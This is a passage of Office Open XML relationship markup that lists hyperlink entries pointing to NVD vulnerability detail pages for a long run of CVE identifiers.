Target="https://nvd.nist.gov/vuln/detail/CVE-2026-85197" TargetMode="External" Id="rId2478" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-85221" TargetMode="External" Id="rId2479" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-85533" TargetMode="External" Id="rId2480" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2021-44319" TargetMode="External" Id="rId2481" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2021-44320" TargetMode="External" Id="rId2482" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2025-23173" TargetMode="External" Id="rId2483" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2025-48431" TargetMode="External" Id="rId2484" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2025-51675" TargetMode="External" Id="rId2485" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2025-52182" TargetMode="External" Id="rId2486" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2025-61478" TargetMode="External" Id="rId2487" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2025-61479" TargetMode="External" Id="rId2488" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2025-61480" TargetMode="External" Id="rId2489" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2025-61726" TargetMode="External" Id="rId2490" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2025-63913" TargetMode="External" Id="rId2491" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2025-69223" TargetMode="External" Id="rId2492" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2025-70147" TargetMode="External" Id="rId2493" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2025-70148" TargetMode="External" Id="rId2494" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2025-70962" TargetMode="External" Id="rId2495" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-0860" TargetMode="External" Id="rId2496" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-12151" TargetMode="External" Id="rId2497" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-12483" TargetMode="External" Id="rId2498" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-13297" TargetMode="External" Id="rId2499" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-13676" TargetMode="External" Id="rId2500" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-14164" TargetMode="External" Id="rId2501" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-14296" TargetMode="External" Id="rId2502" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-14444" TargetMode="External" Id="rId2503" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-14957" TargetMode="External" Id="rId2504" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-15019" TargetMode="External" Id="rId2505" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-1519" TargetMode="External" Id="rId2506" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-15406" TargetMode="External" Id="rId2507" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-15462" TargetMode="External" Id="rId2508" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-15667" TargetMode="External" Id="rId2509" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-15816" TargetMode="External" Id="rId2510" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-16025" TargetMode="External" Id="rId2511" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-16028" TargetMode="External" Id="rId2512" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-16037" TargetMode="External" Id="rId2513" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-16497" TargetMode="External" Id="rId2514" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-16960" TargetMode="External" Id="rId2515" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-17255" TargetMode="External" Id="rId2516" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-17470" TargetMode="External" Id="rId2517" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-18056" TargetMode="External" Id="rId2518" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-18175" TargetMode="External" Id="rId2519" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-18355" TargetMode="External" Id="rId2520" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-18453" TargetMode="External" Id="rId2521" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-18561" TargetMode="External" Id="rId2522" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-18611" TargetMode="External" Id="rId2523" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-18649" TargetMode="External" Id="rId2524" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-18672" TargetMode="External" Id="rId2525" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-18907" TargetMode="External" Id="rId2526" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-19080" TargetMode="External" Id="rId2527" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-19205" TargetMode="External" Id="rId2528" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-19300" TargetMode="External" Id="rId2529" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-19305" TargetMode="External" Id="rId2530" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-19436" TargetMode="External" Id="rId2531" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-19439" TargetMode="External" Id="rId2532" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-19534" TargetMode="External" Id="rId2533" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-19654" TargetMode="External" Id="rId2534" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-19858" TargetMode="External" Id="rId2535" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-21728" TargetMode="External" Id="rId2536" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-22591" TargetMode="External" Id="rId2537" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-23490" TargetMode="External" Id="rId2538" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-24301" TargetMode="External" Id="rId2539" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-25639" TargetMode="External" Id="rId2540" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-25679" TargetMode="External" Id="rId2541" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-26278" TargetMode="External" Id="rId2542" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-26456" TargetMode="External" Id="rId2543" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-27137" TargetMode="External" Id="rId2544" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-27462" TargetMode="External" Id="rId2545" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-27490" TargetMode="External" Id="rId2546" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-27889" TargetMode="External" Id="rId2547" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-28604" TargetMode="External" Id="rId2548" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-29074" TargetMode="External" Id="rId2549" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-29181" TargetMode="External" Id="rId2550" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-29785" TargetMode="External" Id="rId2551" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-3039" TargetMode="External" Id="rId2552" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-30866" TargetMode="External" Id="rId2553" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-30922" TargetMode="External" Id="rId2554" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-3174" TargetMode="External" Id="rId2555" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-32280" TargetMode="External" Id="rId2556" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-32283" TargetMode="External" Id="rId2557" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-32285" TargetMode="External" Id="rId2558" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-32286" TargetMode="External" Id="rId2559" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-32597" TargetMode="External" Id="rId2560" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-33216" TargetMode="External" Id="rId2561" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-33218" TargetMode="External" Id="rId2562" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-33231" TargetMode="External" Id="rId2563" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-33487" TargetMode="External" Id="rId2564" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-33630" TargetMode="External" Id="rId2565" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-33811" TargetMode="External" Id="rId2566" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-33814" TargetMode="External" Id="rId2567" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-33870" TargetMode="External" Id="rId2568" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-33894" TargetMode="External" Id="rId2569" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-34355" TargetMode="External" Id="rId2570" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-34986" TargetMode="External" Id="rId2571" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-35172" TargetMode="External" Id="rId2572" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-37198" TargetMode="External" Id="rId2573" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-37237" TargetMode="External" Id="rId2574" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-37736" TargetMode="External" Id="rId2575" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-38344" TargetMode="External" Id="rId2576" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-38346" TargetMode="External" Id="rId2577" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-38347" TargetMode="External" Id="rId2578" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-38348" TargetMode="External" Id="rId2579" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-38349" TargetMode="External" Id="rId2580" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-38350" TargetMode="External" Id="rId2581" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-38636" TargetMode="External" Id="rId2582" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-38638" TargetMode="External" Id="rId2583" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-39820" TargetMode="External" Id="rId2584" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-39829" TargetMode="External" Id="rId2585" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-41602" TargetMode="External" Id="rId2586" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-42151" TargetMode="External" Id="rId2587" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-42154" TargetMode="External" Id="rId2588" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-42499" TargetMode="External" Id="rId2589" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-42536" TargetMode="External" Id="rId2590" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-42587" TargetMode="External" Id="rId2591" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-43003" TargetMode="External" Id="rId2592" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-44250" TargetMode="External" Id="rId2593" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-44486" TargetMode="External" Id="rId2594" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-44488" TargetMode="External" Id="rId2595" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-44496" TargetMode="External" Id="rId2596" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-44673" TargetMode="External" Id="rId2597" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-44890" TargetMode="External" Id="rId2598" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-44893" TargetMode="External" Id="rId2599" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-45103" TargetMode="External" Id="rId2600" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-45378" TargetMode="External" Id="rId2601" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-45416" TargetMode="External" Id="rId2602" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-45698" TargetMode="External" Id="rId2603" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-45736" TargetMode="External" Id="rId2604" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-45741" TargetMode="External" Id="rId2605" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-45742" TargetMode="External" Id="rId2606" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-45747" TargetMode="External" Id="rId2607" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-45759" TargetMode="External" Id="rId2608" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-45762" TargetMode="External" Id="rId2609" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-45765" TargetMode="External" Id="rId2610" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-45766" TargetMode="External" Id="rId2611" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-45768" TargetMode="External" Id="rId2612" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-45769" TargetMode="External" Id="rId2613" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-45770" TargetMode="External" Id="rId2614" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-45798" TargetMode="External" Id="rId2615" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-46340" TargetMode="External" Id="rId2616" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-46343" TargetMode="External" Id="rId2617" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-46369" TargetMode="External" Id="rId2618" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-46387" TargetMode="External" Id="rId2619" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-46579" TargetMode="External" Id="rId2620" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-46625" TargetMode="External" Id="rId2621" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-47249" TargetMode="External" Id="rId2622" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-47625" TargetMode="External" Id="rId2623" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-47885" TargetMode="External" Id="rId2624" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-47886" TargetMode="External" Id="rId2625" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-47888" TargetMode="External" Id="rId2626" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-47889" TargetMode="External" Id="rId2627" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-47895" TargetMode="External" Id="rId2628" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-48043" TargetMode="External" Id="rId2629" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-48486" TargetMode="External" Id="rId2630" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-48779" TargetMode="External" Id="rId2631" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-48804" TargetMode="External" Id="rId2632" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-48888" TargetMode="External" Id="rId2633" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-4926" TargetMode="External" Id="rId2634" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-49362" TargetMode="External" Id="rId2635" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-49363" TargetMode="External" Id="rId2636" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-50010" TargetMode="External" Id="rId2637" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-50011" TargetMode="External" Id="rId2638" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-50142" TargetMode="External" Id="rId2639" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-50578" TargetMode="External" Id="rId2640" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-50776" TargetMode="External" Id="rId2641" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-51367" TargetMode="External" Id="rId2642" /><Relationship 